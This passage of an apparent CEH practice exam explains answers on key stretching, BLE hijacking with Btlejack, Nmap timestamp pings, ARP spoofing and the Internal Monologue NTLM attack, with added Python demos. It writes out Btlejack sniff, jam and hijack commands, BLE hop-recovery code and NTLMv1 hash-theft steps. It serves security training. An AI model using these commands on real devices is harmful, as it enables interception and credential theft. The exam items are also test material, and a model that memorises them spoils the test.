same effort for each attempt. If this added effort compares to a brute-force key search of all keys with a certain key length, then the input key may be described as stretched by that same length. 
Key stretching leaves an attacker with two options: – Attempt possible combinations of the enhanced key, but this is infeasible if the enhanced key is sufficiently long and unpredictable (??i.e.,?the algorithm mimics randomness well enough that the attacker must trial the entire stretched key space). – Attempt possible combinations of the weaker initial key, potentially commencing with a dictionary attack if the initial key is a password or passphrase, but the attacker‘s added effort for each trial could render the attack uneconomic should the costlier computation and memory consumption outweigh the expected profit. If the attacker uses the same class of hardware as the user, each guess will take the similar amount of time to process as it took the user (for example, one second). Even if the attacker has much greater computing resources than the user, the key stretching will still slow the attacker down while not seriously affecting the usability of the system for any legitimate user. This is because the user‘s computer only has to compute the stretching function once upon the user entering their password, whereas the attacker must compute it for every guess in the attack. This process does not alter the original key-space entropy. The key stretching algorithm is deterministic, allowing a weak input to always generate the same enhanced key, but therefore limiting the enhanced key to no more possible combinations than the input key space. Consequently, this attack remains vulnerable if unprotected against certain time-memory tradeoffs such as developing rainbow tables to target multiple instances of the enhanced key space in parallel (effectively a shortcut to repeating the algorithm). For this reason, key stretching is often combined with salting. 
Incorrect answers: KDF https://en.wikipedia.org/wiki/Key_derivation_function Key derivation function (KDF) is a cryptographic hash function that derives one or more secret keys from a secret value such as the main key, a password, or a passphrase using a pseudorandom function. KDFs can be used to stretch keys into longer keys or to obtain keys of a required format, such as converting a group element that is the result of a DiffieHellman key exchange into a symmetric key for use with AES. Keyed cryptographic hash functions are popular examples of pseudorandom functions used for key derivation. PKI https://en.wikipedia.org/wiki/Public_key_infrastructure A public key infrastructure (PKI) is a set of roles, policies, hardware, software and procedures needed to create, manage, distribute, use, store and revoke digital certificates and manage public-key encryption. The purpose of a PKI is to facilitate the secure electronic transfer of information for a range of network activities such as e-commerce, internet banking and confidential email. It is required for activities where simple passwords are an inadequate authentication method and more rigorous proof is required to confirm the identity of the parties involved in the communication and to validate the information being transferred. In cryptography, a PKI is an arrangement that binds public keys with respective identities of entities (like people and organizations). The binding is established through a process of registration and issuance of certificates at and by a certificate authority (CA). Depending on the assurance level of the binding, this may be carried out by an automated process or under human supervision. When done over a network, this requires using a secure certificate enrollment or certificate management protocol such as CMP. 
Key reinstallation https://en.wikipedia.org/wiki/KRACK KRACK (“Key Reinstallation Attack“) is a replay attack (a type of exploitable flaw) on the Wi-Fi Protected Access protocol that secures Wi-Fi connections. It was discovered in 2016 by the Belgian researchers Mathy Vanhoef and Frank Piessens of the University of Leuven. Vanhoef‘s research group published details of the attack in October 2017. By repeatedly resetting the nonce transmitted in the third step of the WPA2 handshake, an attacker can gradually match encrypted packets seen before and learn the full keychain used to encrypt the traffic. The weakness is exhibited in the Wi-Fi standard itself, and not due to errors in the implementation of a sound standard by individual products or implementations. Therefore, any correct implementation of WPA2 is likely to be vulnerable. The vulnerability affects all major software platforms, including Microsoft Windows, macOS, iOS, Android, Linux, OpenBSD and others. The security protocol protecting many Wi-Fi devices can essentially be bypassed, potentially allowing an attacker to intercept sent and received data.
Unattempted
https://en.wikipedia.org/wiki/Key_stretching Key stretching techniques are used to make a possibly weak key, typically a password or passphrase, more secure against a brute-force attack by increasing the resources (time and possibly space) it takes to test each possible key. Passwords or passphrases created by humans are often short or predictable enough to allow password cracking, and key stretching is intended to make such attacks more difficult by complicating a basic step of trying a single password candidate. Key stretching also improves security in some real-world applications where the key length has been constrained, by mimicking a longer key length from the perspective of a brute-force attacker. There are several ways to perform key stretching. One way is to apply a cryptographic hash function or a block cipher repeatedly in a loop. For example, in applications where the key is used for a cipher, the key schedule in the cipher may be modified so that it takes a specific length of time to perform. Another way is to use cryptographic hash functions that have large memory requirements these can be effective in frustrating attacks by memory-bound adversaries. Key stretching algorithms depend on an algorithm that receives an input key and then expends considerable effort to generate a stretched cipher (called an enhanced key[citation needed]) mimicking randomness and longer key length. The algorithm must have no known shortcut, so the most efficient way to relate the input and cipher is to repeat the key stretching algorithm itself. This compels brute-force attackers to expend the same effort for each attempt. If this added effort compares to a brute-force key search of all keys with a certain key length, then the input key may be described as stretched by that same length. 
Key stretching leaves an attacker with two options: – Attempt possible combinations of the enhanced key, but this is infeasible if the enhanced key is sufficiently long and unpredictable (??i.e.,?the algorithm mimics randomness well enough that the attacker must trial the entire stretched key space). – Attempt possible combinations of the weaker initial key, potentially commencing with a dictionary attack if the initial key is a password or passphrase, but the attacker‘s added effort for each trial could render the attack uneconomic should the costlier computation and memory consumption outweigh the expected profit. If the attacker uses the same class of hardware as the user, each guess will take the similar amount of time to process as it took the user (for example, one second). Even if the attacker has much greater computing resources than the user, the key stretching will still slow the attacker down while not seriously affecting the usability of the system for any legitimate user. This is because the user‘s computer only has to compute the stretching function once upon the user entering their password, whereas the attacker must compute it for every guess in the attack. This process does not alter the original key-space entropy. The key stretching algorithm is deterministic, allowing a weak input to always generate the same enhanced key, but therefore limiting the enhanced key to no more possible combinations than the input key space. Consequently, this attack remains vulnerable if unprotected against certain time-memory tradeoffs such as developing rainbow tables to target multiple instances of the enhanced key space in parallel (effectively a shortcut to repeating the algorithm). For this reason, key stretching is often combined with salting. 
Incorrect answers: KDF https://en.wikipedia.org/wiki/Key_derivation_function Key derivation function (KDF) is a cryptographic hash function that derives one or more secret keys from a secret value such as the main key, a password, or a passphrase using a pseudorandom function. KDFs can be used to stretch keys into longer keys or to obtain keys of a required format, such as converting a group element that is the result of a DiffieHellman key exchange into a symmetric key for use with AES. Keyed cryptographic hash functions are popular examples of pseudorandom functions used for key derivation. PKI https://en.wikipedia.org/wiki/Public_key_infrastructure A public key infrastructure (PKI) is a set of roles, policies, hardware, software and procedures needed to create, manage, distribute, use, store and revoke digital certificates and manage public-key encryption. The purpose of a PKI is to facilitate the secure electronic transfer of information for a range of network activities such as e-commerce, internet banking and confidential email. It is required for activities where simple passwords are an inadequate authentication method and more rigorous proof is required to confirm the identity of the parties involved in the communication and to validate the information being transferred. In cryptography, a PKI is an arrangement that binds public keys with respective identities of entities (like people and organizations). The binding is established through a process of registration and issuance of certificates at and by a certificate authority (CA). Depending on the assurance level of the binding, this may be carried out by an automated process or under human supervision. When done over a network, this requires using a secure certificate enrollment or certificate management protocol such as CMP. 
Key reinstallation https://en.wikipedia.org/wiki/KRACK KRACK ("Key Reinstallation Attack") is a replay attack (a type of exploitable flaw) on the Wi-Fi Protected Access protocol that secures Wi-Fi connections. It was discovered in 2016 by the Belgian researchers Mathy Vanhoef and Frank Piessens of the University of Leuven. Vanhoef's research group published details of the attack in October 2017. By repeatedly resetting the nonce transmitted in the third step of the WPA2 handshake, an attacker can gradually match encrypted packets seen before and learn the full keychain used to encrypt the traffic. The weakness is exhibited in the Wi-Fi standard itself, and not due to errors in the implementation of a sound standard by individual products or implementations. Therefore, any correct implementation of WPA2 is likely to be vulnerable. The vulnerability affects all major software platforms, including Microsoft Windows, macOS, iOS, Android, Linux, OpenBSD and others. The security protocol protecting many Wi-Fi devices can essentially be bypassed, potentially allowing an attacker to intercept sent and received data.
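The following is an added example, not part of the original page: it uses PBKDF2-HMAC-SHA256 from Python's standard library as the stretching function and walks through the two points made above, that stretching is deterministic (equal passwords give equal stored keys, and one precomputed table cracks every user sharing a salt) and that a per-user random salt defeats that shortcut. The wordlist, iteration count and user names are constructed for the demo.

```python
import hashlib
import secrets

# Added example, not from the source page: PBKDF2-HMAC-SHA256 (hashlib, standard
# library) as the key-stretching function. ITERATIONS is kept small so the demo
# runs quickly; real deployments use far higher counts.

ITERATIONS = 20_000


def stretch(password: bytes, salt: bytes, iterations: int = ITERATIONS, length: int = 32) -> bytes:
    """Deterministic stretching: the same (password, salt, iterations) always yields
    the same enhanced key, so the output space is no larger than the input space."""
    return hashlib.pbkdf2_hmac("sha256", password, salt, iterations, dklen=length)


def precompute_table(wordlist, salt: bytes, iterations: int = ITERATIONS) -> dict:
    """Attacker's time-memory trade-off: run the stretching once per candidate for a
    fixed salt, then reuse the table against every stored key that used that salt."""
    return {stretch(word, salt, iterations): word for word in wordlist}


def crack_with_table(table: dict, stored_key: bytes):
    """Table lookup: the candidate password behind a stored key, or None."""
    return table.get(stored_key)


# Constructed wordlist and two users who happen to share a password.
WORDLIST = [b"password", b"letmein", b"hunter2", b"correct horse battery staple"]
SHARED_PASSWORD = b"hunter2"


def unsalted_deployment():
    """No per-user salt (salt fixed to b''): one table cracks every user, and equal
    passwords produce identical stored keys."""
    table = precompute_table(WORDLIST, b"")
    alice = stretch(SHARED_PASSWORD, b"")
    bob = stretch(SHARED_PASSWORD, b"")
    return crack_with_table(table, alice), crack_with_table(table, bob), alice == bob


def salted_deployment():
    """Per-user random salt: the table built for salt b'' no longer hits, and the two
    users' stored keys differ even though their passwords are equal."""
    table = precompute_table(WORDLIST, b"")
    alice_salt, bob_salt = secrets.token_bytes(16), secrets.token_bytes(16)
    alice = stretch(SHARED_PASSWORD, alice_salt)
    bob = stretch(SHARED_PASSWORD, bob_salt)
    return crack_with_table(table, alice), crack_with_table(table, bob), alice == bob


if __name__ == "__main__":
    print("unsalted:", unsalted_deployment())  # (b'hunter2', b'hunter2', True)
    print("salted:  ", salted_deployment())    # (None, None, False)
```

The attacker's cost per guess is the same `ITERATIONS` the legitimate login pays once; raising it slows both sides equally, which is the whole trade-off the text describes. The salt does not add entropy to the password; it only forces the attacker to rebuild the table per user.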
Question 38 of 65
38. Question
An attacker carries out an attack using a micro:bit and Btlejack, running a sequence of commands in the console. Afterwards he is able to read and export sensitive information exchanged between the connected devices. Which of the following commands did the attacker use to hijack the connection?
Correct
https://github.com/virtualabs/btlejack This question looks a bit abstract, but a question on this topic does appear on the exam. To answer it, look at the "Btlejacking using Btlejack" example in EC-Council's courseware. Btlejacking is performed with the following steps:
1. Select the sniffer devices (micro:bits flashed with the Btlejack firmware): btlejack -d /dev/ttyACM0 -d /dev/ttyACM2 -s
2. Position the Btlejack hardware within a radius of about 5 m of the target devices.
3. Capture already established (live) as well as new Bluetooth Low Energy (BLE) connections:
– Sniff an existing connection: btlejack -s
– Sniff for new connections: btlejack -c any
4. Once the connection is captured, jam it: btlejack -f 0x129f3244 -j
5. Hijack the connection: btlejack -f 0x9c68fd30 -t -m 0x1fffffffff
6. Export the captured data in pcap format: btlejack -f 0xac56bc12 -x nordic -o capture.nordic.pcap
Here -f takes the 32-bit access address of the target connection, -j jams it, -t hijacks it, -m supplies the 37-bit data-channel map and -x selects the pcap flavour. The three access addresses shown are separate examples from the project README; against one real connection the same address is passed to each step. The command that answers the question is the one in step 5, with the -t (hijack) flag.
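What the channel map on the hijack command actually encodes, and what a sniffer must reproduce to follow a connection, is easier to see in code. The block below is an added example and is not part of the page or of Btlejack: it decodes a 37-bit BLE data-channel map (0x1fffffffff means all 37 channels), reproduces Channel Selection Algorithm #1 (the hop sequence used by Bluetooth 4.x connections; Bluetooth 5 connections may use the different CSA #2), and brute-forces the hop increment from a short observed channel sequence, which is the kind of parameter recovery a BLE sniffer performs before it can jam or hijack. Channel maps and hop values below are constructed.

```python
from typing import List, Optional

# Added example, not part of the source page or of Btlejack: decode the 37-bit
# channel map that "-m 0x1fffffffff" passes to Btlejack and reproduce Channel
# Selection Algorithm #1 (Bluetooth 4.x), the hop sequence a sniffer must follow
# once it knows a connection's channel map and hop increment.

BLE_DATA_CHANNELS = 37          # data channels 0..36; 37, 38, 39 are advertising channels
ALL_CHANNELS = 0x1FFFFFFFFF     # every data channel in use


def used_channels(channel_map: int) -> List[int]:
    """Data channels whose bit is set (bit 0 = channel 0); this is the remapping table."""
    if not 0 <= channel_map < (1 << BLE_DATA_CHANNELS):
        raise ValueError("channel map must be a 37-bit value")
    return [ch for ch in range(BLE_DATA_CHANNELS) if (channel_map >> ch) & 1]


def hop_sequence(channel_map: int, hop_increment: int, last_unmapped: int = 0,
                 count: int = 10) -> List[int]:
    """Channel Selection Algorithm #1: unmapped = (last + hopIncrement) mod 37; use it
    if it is in the map, otherwise take used[unmapped mod len(used)]."""
    if not 5 <= hop_increment <= 16:
        raise ValueError("hopIncrement is 5..16 in the specification")
    used = used_channels(channel_map)
    if not used:
        raise ValueError("channel map selects no channels")
    seq = []
    unmapped = last_unmapped
    for _ in range(count):
        unmapped = (unmapped + hop_increment) % BLE_DATA_CHANNELS
        if (channel_map >> unmapped) & 1:
            seq.append(unmapped)
        else:
            seq.append(used[unmapped % len(used)])
    return seq


def recover_hop_increment(channel_map: int, observed: List[int]) -> Optional[int]:
    """Brute-force the hop increment (and the unknown start channel) that reproduces a
    short observed channel sequence; None if zero or several increments fit."""
    fits = set()
    for hop in range(5, 17):
        for start in range(BLE_DATA_CHANNELS):
            if hop_sequence(channel_map, hop, start, len(observed)) == observed:
                fits.add(hop)
    return fits.pop() if len(fits) == 1 else None


if __name__ == "__main__":
    seq = hop_sequence(ALL_CHANNELS, hop_increment=7, count=6)
    print("next channels:", seq)                                        # [7, 14, 21, 28, 35, 5]
    print("recovered hop increment:", recover_hop_increment(ALL_CHANNELS, seq))  # 7
    print("partial map 0x3ff, hop 5:", hop_sequence(0x3FF, 5, count=4))  # [5, 0, 5, 0]
```

With a full channel map the increment is simply the difference between consecutive channels mod 37, which is why a few captured packets are enough; with a sparse map the remapping step hides the increment and the brute force above, or a longer observation, is needed.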
Question 39 of 65
39. Question
Rajesh wants to make the Internet a little safer and uses his skills to scan the networks of various organizations and find vulnerabilities, even without the owners' permission. He informs the company owner about the problems he found, but if the company ignores him and does not fix the vulnerabilities, Rajesh publishes them and so forces the company to respond. Which type of hacker best describes Rajesh?
Correct
https://www.kaspersky.com/resource-center/definitions/hacker-hat-types Grey hat hackers are a blend of both black hat and white hat activities. Often, grey hat hackers will look for vulnerabilities in a system without the owner's permission or knowledge. If issues are found, they will report them to the owner, sometimes requesting a small fee to fix the problem. If the owner does not respond or comply, the hackers will sometimes post the newly found exploit online for the world to see. These hackers are not inherently malicious; they are just looking to get something out of their discoveries for themselves. Usually, grey hat hackers will not exploit the vulnerabilities they find. However, this type of hacking is still considered illegal because the hacker did not receive permission from the owner before attacking the system.
Question 40 of 65
40. Question
Which of the following standards is most applicable to a major credit card company?
Correct
https://en.wikipedia.org/wiki/Payment_Card_Industry_Data_Security_Standard The Payment Card Industry Data Security Standard (PCI DSS) is an information security standard for organizations that handle branded credit cards from the major card schemes. The PCI Standard is mandated by the card brands but administered by the Payment Card Industry Security Standards Council. The standard was created to increase controls around cardholder data to reduce credit card fraud. Validation of compliance is performed annually or quarterly, by a method suited to the volume of transactions handled: a Self-Assessment Questionnaire (SAQ) for smaller volumes; an external Qualified Security Assessor (QSA) for moderate volumes, which involves an Attestation of Compliance (AOC); a firm-specific Internal Security Assessor (ISA) for larger volumes, which involves issuing a Report on Compliance (ROC). Incorrect answers: FISMA https://en.wikipedia.org/wiki/Federal_Information_Security_Management_Act_of_2002 The Federal Information Security Management Act of 2002 (FISMA, 44 U.S.C. § 3541, et seq.) is a United States federal law enacted in 2002 as Title III of the E-Government Act of 2002 (Pub.L. 107-347, 116 Stat. 2899). The act recognized the importance of information security to the economic and national security interests of the United States. The act requires each federal agency to develop, document, and implement an agency-wide program to provide information security for the information and information systems that support the operations and assets of the agency, including those provided or managed by another agency, contractor, or other source. 
FISMA has brought attention within the federal government to cybersecurity and explicitly emphasized a "risk-based policy for cost-effective security." FISMA requires agency program officials, chief information officers, and inspectors general (IGs) to conduct annual reviews of the agency's information security program and report the results to the Office of Management and Budget (OMB). OMB uses this data to assist in its oversight responsibilities and to prepare its annual report to Congress on agency compliance with the act. In FY 2008, federal agencies spent $6.2 billion securing the government's total information technology investment of approximately $68 billion, or about 9.2 percent of the total information technology portfolio. Sarbanes-Oxley Act https://en.wikipedia.org/wiki/Sarbanes%E2%80%93Oxley_Act The Sarbanes-Oxley Act of 2002 is a United States federal law that mandates certain practices in financial record keeping and reporting for corporations. The act (Pub.L. 107-204, 116 Stat. 745, enacted July 30, 2002), also known as the "Public Company Accounting Reform and Investor Protection Act" (in the Senate) and "Corporate and Auditing Accountability, Responsibility, and Transparency Act" (in the House) and more commonly called Sarbanes-Oxley or SOX, contains eleven sections that place requirements on all U.S. public company boards of directors and management and public accounting firms. A number of provisions of the Act also apply to privately held companies, such as the willful destruction of evidence to impede a federal investigation. The law was enacted as a reaction to a number of major corporate and accounting scandals, including Enron and WorldCom. The sections of the bill cover responsibilities of a public corporation's board of directors, add criminal penalties for certain misconduct, and require the Securities and Exchange Commission to create regulations to define how public corporations are to comply with the law. 
HIPAA https://en.wikipedia.org/wiki/Health_Insurance_Portability_and_Accountability_Act The Health Insurance Portability and Accountability Act of 1996 (HIPAA or the Kennedy-Kassebaum Act) is a United States federal statute enacted by the 104th United States Congress and signed into law by President Bill Clinton on August 21, 1996. It modernized the flow of healthcare information, stipulates how personally identifiable information maintained by the healthcare and healthcare insurance industries should be protected from fraud and theft, and addressed some limitations on healthcare insurance coverage. It generally prohibits healthcare providers and healthcare businesses, called covered entities, from disclosing private information to anyone other than a patient and the patient's authorized representatives. It does not restrict patients from receiving information about themselves, prohibit them from voluntarily sharing their private health information however they choose, or, if they disclose private medical information to family members, friends, or other private individuals, legally require those non-covered people to maintain confidentiality.
Question 41 of 65
41. Question
Identify the Google advanced search operator that helps an attacker gather information about websites similar to a specified target URL.
Correct
https://ktflash.gitbooks.io/ceh_v9/content/222_footprinting_using_advanced_google_hacking_tec.html [related:] Lists web pages that are similar to a specified web page. Incorrect answers: [link:] Lists web pages that have links to the specified web page (Google retired this operator in 2017, but it still appears in CEH material). [site:] Restricts the results to those websites in the given domain. [inurl:] Restricts the results to documents containing the search keyword in the URL.
Question 42 of 65
42. Question
Using a Wi-Fi Pineapple to run an access point with a legitimate-looking SSID for a nearby business is an example of which of the following types of attack?
Correct
https://terranovasecurity.com/wi-fi-pineapple-cyber-security-threat/ A Wi-Fi Pineapple is a wireless auditing platform from Hak5 that allows network security administrators to conduct penetration tests. Pen tests are a type of ethical hacking in which white hat hackers seek out security vulnerabilities that a black hat attacker could exploit (the labels come from old Western movies, in which the good guys wore white hats and the bad guys wore black hats). A Wi-Fi Pineapple can also be used as a rogue access point (AP) to conduct man-in-the-middle (MitM) attacks. A MitM attack is one in which the attacker secretly intercepts and relays messages between two parties that believe they are communicating directly with each other. The low price and friendly user interface (UI) enable attackers with little technical knowledge to eavesdrop on devices using public Wi-Fi networks in order to collect sensitive personal information, including passwords. Uses of the Wi-Fi Pineapple: it was originally built by Hak5 to perform pen tests and help network administrators audit network security. The AP enables network engineers to attack their own network in order to identify vulnerabilities and put mechanisms in place to strengthen it against potential attackers. When a Pineapple is used for pen testing, the source refers to it as a honeypot. When a Pineapple is used as a rogue AP that imitates a legitimate network's SSID to conduct MitM attacks, it is referred to as an evil twin (or "pineapple sandwich"), which is the answer here.
Question 43 of 65
43. Question
The date and time of a remote host can, in theory, be used against systems whose other services rely on weak time-seeded random number generators. Which option in Zenmap will allow you to send an ICMP timestamp ping?
Correct
https://nmap.org/book/host-discovery-techniques.html Host-discovery probe types and the Nmap flags behind them:
– No ping (skip host discovery): nmap -Pn [target] (older syntax: -PN)
– UDP ping: nmap -PU [target]
– ICMP echo ping: nmap -PE [target]
– ICMP timestamp ping: nmap -PP [target]
– ICMP address mask ping: nmap -PM [target]
– SCTP INIT ping: nmap -PY [target]
The ICMP timestamp option is the one to pick; Zenmap simply adds -PP to the command line it generates. NOTE: https://nmap.org/zenmap/ Zenmap is the official Nmap Security Scanner GUI. It is a multi-platform (Linux, Windows, Mac OS X, BSD, etc.) free and open-source application that aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users. Frequently used scans can be saved as profiles to make them easy to run repeatedly. A command creator allows the interactive creation of Nmap command lines. Scan results can be saved and viewed later. Saved scan results can be compared with one another to see how they differ. The results of recent scans are stored in a searchable database.
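To make concrete what -PP sends and what a reply gives away, here is an added example that is not part of the page or of Nmap: it builds the ICMP timestamp request (type 13) with a correct Internet checksum, constructs the type 14 reply a host would return, and decodes the reply's transmit field into the remote host's time of day. Nothing is sent on the wire; the identifier, sequence number and timestamp values are constructed.

```python
import struct

# Added example, not from the source page or from Nmap: build the ICMP timestamp
# request (type 13) that "nmap -PP" sends and parse a constructed type 14 reply to
# read the remote host's clock. Pure packet construction; nothing is transmitted.

ICMP_TIMESTAMP_REQUEST = 13
ICMP_TIMESTAMP_REPLY = 14
HDR = "!BBHHHIII"               # type, code, checksum, id, seq, originate, receive, transmit
HDR_LEN = struct.calcsize(HDR)  # 20 bytes


def internet_checksum(data: bytes) -> int:
    """RFC 1071: one's complement of the one's-complement sum of 16-bit words.
    Over a message whose checksum field is already correct the result is 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_timestamp_request(ident: int, seq: int, originate_ms: int) -> bytes:
    """Probe with our own clock in the originate field; receive/transmit are zero."""
    hdr = struct.pack(HDR, ICMP_TIMESTAMP_REQUEST, 0, 0, ident, seq, originate_ms, 0, 0)
    return hdr[:2] + struct.pack("!H", internet_checksum(hdr)) + hdr[4:]


def build_timestamp_reply(request: bytes, receive_ms: int, transmit_ms: int) -> bytes:
    """What a responding host sends back: id, seq and originate copied, its own clock
    (milliseconds since midnight UTC) in receive and transmit. Constructed for the demo."""
    _, _, _, ident, seq, originate, _, _ = struct.unpack(HDR, request[:HDR_LEN])
    hdr = struct.pack(HDR, ICMP_TIMESTAMP_REPLY, 0, 0, ident, seq, originate, receive_ms, transmit_ms)
    return hdr[:2] + struct.pack("!H", internet_checksum(hdr)) + hdr[4:]


def parse_timestamp_reply(pkt: bytes) -> dict:
    """Validate and decode a type 14 reply; raises ValueError on anything else."""
    if len(pkt) < HDR_LEN:
        raise ValueError("short ICMP message")
    if internet_checksum(pkt[:HDR_LEN]) != 0:
        raise ValueError("bad ICMP checksum")
    typ, code, _, ident, seq, originate, receive, transmit = struct.unpack(HDR, pkt[:HDR_LEN])
    if typ != ICMP_TIMESTAMP_REPLY or code != 0:
        raise ValueError("not an ICMP timestamp reply (type %d code %d)" % (typ, code))
    return {"id": ident, "seq": seq, "originate": originate,
            "receive": receive, "transmit": transmit}


def ms_to_clock(ms: int) -> str:
    """Render a timestamp field as HH:MM:SS.mmm UTC. RFC 792: a set high-order bit
    means the host is not using the standard milliseconds-since-midnight-UTC value."""
    if ms & 0x80000000:
        return "non-standard (0x%08x)" % ms
    hours, rest = divmod(ms, 3_600_000)
    minutes, rest = divmod(rest, 60_000)
    seconds, millis = divmod(rest, 1000)
    return "%02d:%02d:%02d.%03d UTC" % (hours, minutes, seconds, millis)


def remote_clock(reply: bytes) -> str:
    """The value an attacker learns: the target's time of day from the transmit field."""
    return ms_to_clock(parse_timestamp_reply(reply)["transmit"])


if __name__ == "__main__":
    req = build_timestamp_request(ident=0x1234, seq=1, originate_ms=45_000_000)
    rep = build_timestamp_reply(req, receive_ms=45_296_123, transmit_ms=45_296_124)
    print(remote_clock(rep))   # 12:34:56.124 UTC
```

Comparing the reply's transmit field with the originate value you sent gives the clock offset between you and the target, which is the information the question alludes to; hosts that do not answer type 13 at all (many firewalls drop it) simply yield no reply, and Nmap then falls back on whatever other probes were selected.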
Question 44 of 65
44. Question
Alexa, a college student, goes to a cafe. While waiting for her order she connects to the public Wi-Fi network without any additional protection such as a VPN. How can she check whether someone is performing an ARP spoofing attack against her laptop?
Correct
https://www.comparitech.com/blog/information-security/arp-poisoning-spoofing-detect-prevent/ ARP poisoning can be detected in several ways: from the operating system's own ARP cache, with an open-source packet analyzer such as Wireshark, or with a dedicated tool such as XArp. The quickest check uses the local ARP table. Open a command prompt (reading the table does not require elevation; only modifying it does) and run: arp -a. If two different IP addresses show the same MAC address, in particular if the default gateway's IP now shares a MAC with another station on the network, the laptop is probably being ARP-poisoned. Two caveats: broadcast (ff-ff-ff-ff-ff-ff) and multicast (01-00-5e-...) entries legitimately map many addresses to one MAC and are not evidence of an attack, and a router that holds several IP addresses on one interface will also show one MAC for several IPs, so the suspicious case is a dynamic entry for the gateway that suddenly matches another host, or a gateway MAC that differs from what it was earlier. You can read about other ways of detecting ARP spoofing here: Wireshark: https://media.neliti.com/media/publications/263063-arp-spoofing-detection-via-wireshark-and-9a79ced5.pdf XArp: http://www.xarp.net/#support
Question 45 of 65
45. Question
The attacker disabled the security controls of NetNTLMv1 by modifying the values of LMCompatibilityLevel, NTLMMinClientSec, and RestrictSendingNTLMTraffic. His next step was to extract all the non-network logon tokens from all the active processes to masquerade as a legitimate user to launch further attacks. Which of the following attacks was performed by the attacker?
Correct
https://github.com/eladshamir/Internal-Monologue The Internal Monologue attack allows NTLMv1 challenge-response hashes to be obtained from the victim's system without injecting code into memory or interacting with protected services such as the Local Security Authority Subsystem Service (LSASS). These hashes can then be cracked or subsequently used in a Pass-the-Hash (PtH) attack. This technique allows a tester to obtain credentials from the system without touching the LSASS process.

The attack takes advantage of the NetNTLMv1 challenge-response protocol. NetNTLMv1 is insecure because of the way it calculates the challenge-response, which allows an attacker to retrieve the NTLM hash by easily cracking the response. Furthermore, retrieving a user's NTLM hash is almost synonymous with retrieving the user's plaintext password, since the hash can be used in a Pass-the-Hash attack or cracked to obtain the plaintext password. Although most modern systems are configured by default to avoid NetNTLMv1, because the attacker is a local administrator of the system, a NetNTLM downgrade attack can be performed to enable this weaker authentication scheme. This disables the preventive controls for NetNTLMv1. The attacker can then retrieve the non-network logon tokens from the running processes and impersonate the associated users. Using the impersonated user's privileges, the attacker can invoke a local procedure call to the NTLM authentication package, MSV1_0, to encrypt a known challenge via SSPI, the secure single sign-on technology in Windows. This generates a NetNTLMv1 response for that challenge using the impersonated user's NTLM hash as the key. Because of the weakness in the NetNTLMv1 challenge-response protocol, the tester can then easily extract the NTLM hash by cracking this response and perform a Pass-the-Hash attack.

Incorrect answers: Dictionary attack https://en.wikipedia.org/wiki/Dictionary_attack A dictionary attack is a form of brute-force attack used for defeating a cipher or authentication mechanism by trying to determine its decryption key or passphrase from thousands or millions of likely possibilities, such as words in a dictionary or previously used passwords, often from lists obtained from past security breaches. Rainbow table attack https://en.wikipedia.org/wiki/Rainbow_table A rainbow table is a precomputed table for caching the output of cryptographic hash functions, usually for cracking password hashes. Tables are usually used in recovering a key derivation function (or credit card numbers, etc.) up to a certain length consisting of a limited set of characters. It is a practical example of a space-time tradeoff, using less processing time and more storage than a brute-force attack that calculates a hash on every attempt, but more processing time and less storage than a simple key derivation function with one entry per hash. Use of a key derivation that employs a salt makes this attack infeasible. Phishing attack https://en.wikipedia.org/wiki/Phishing Phishing is a type of social engineering where an attacker sends a fraudulent ("spoofed") message designed to trick a human victim into revealing sensitive information to the attacker or into deploying malicious software, such as ransomware, on the victim's infrastructure. Phishing attacks have become increasingly sophisticated and often transparently mirror the site being targeted, allowing the attacker to observe everything while the victim navigates the site and to traverse any additional security boundaries with the victim. As of 2020, phishing is by far the most common attack performed by cyber-criminals, with the FBI's Internet Crime Complaint Center recording over twice as many incidents of phishing as of any other type of computer crime.
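A defender's check for the downgrade step in the explanation above: the script audits the three registry values named in the question and reports any setting that leaves NetNTLMv1 usable. This is an added example, not code from the quiz or from the Internal-Monologue project; the registry paths and flag bits are the documented Windows locations, the `SAMPLE_*` dictionaries are constructed, and the severity ratings are this example's own baseline.

```python
"""Audit the three registry values a NetNTLM downgrade changes
(LmCompatibilityLevel, NtlmMinClientSec, RestrictSendingNTLMTraffic) and report
any setting that leaves NetNTLMv1 usable. Added example; the SAMPLE_* dictionaries
are constructed, not read from a real host."""
import sys

# Where the values live under HKEY_LOCAL_MACHINE.
LSA_KEY = r"SYSTEM\CurrentControlSet\Control\Lsa"             # LmCompatibilityLevel
MSV1_0_KEY = r"SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0"   # NtlmMinClientSec, RestrictSendingNTLMTraffic

# NtlmMinClientSec flag bits.
NTLMV2_SESSION_SECURITY = 0x00080000  # require NTLMv2 session security
REQUIRE_128BIT = 0x20000000           # require 128-bit encryption

# Constructed: the state a NetNTLM downgrade leaves behind (NTLMv1 permitted,
# NTLMv2 session security not required, outgoing NTLM unrestricted).
SAMPLE_DOWNGRADED = {"LmCompatibilityLevel": 2,
                     "NtlmMinClientSec": REQUIRE_128BIT,
                     "RestrictSendingNTLMTraffic": 0}
# Constructed: a hardened baseline.
SAMPLE_HARDENED = {"LmCompatibilityLevel": 5,
                   "NtlmMinClientSec": NTLMV2_SESSION_SECURITY | REQUIRE_128BIT,
                   "RestrictSendingNTLMTraffic": 2}


def audit_ntlm_settings(values):
    """values maps the three value names to their DWORD contents (None if absent).
    Returns a list of (severity, finding) tuples, empty when nothing leaves NTLMv1 usable."""
    findings = []

    level = values.get("LmCompatibilityLevel")
    if level is None:
        findings.append(("low", "LmCompatibilityLevel not set; the OS default applies "
                                "(3 on Windows Vista/Server 2008 and later)"))
    elif level < 3:
        findings.append(("high", f"LmCompatibilityLevel={level}: client may send LM/NTLMv1 "
                                 "responses (expect 3 or higher, ideally 5)"))
    elif level < 5:
        findings.append(("low", f"LmCompatibilityLevel={level}: client sends NTLMv2 only, but "
                                "the server side still accepts NTLMv1 (5 refuses LM and NTLMv1)"))

    min_sec = values.get("NtlmMinClientSec") or 0
    if not min_sec & NTLMV2_SESSION_SECURITY:
        findings.append(("high", f"NtlmMinClientSec=0x{min_sec:08x}: NTLMv2 session security not required"))
    if not min_sec & REQUIRE_128BIT:
        findings.append(("medium", f"NtlmMinClientSec=0x{min_sec:08x}: 128-bit encryption not required"))

    restrict = values.get("RestrictSendingNTLMTraffic")
    if not restrict:
        findings.append(("medium", "RestrictSendingNTLMTraffic is 0/unset: outgoing NTLM is "
                                   "unrestricted (1 = audit all, 2 = deny all)"))
    return findings


def read_ntlm_settings():
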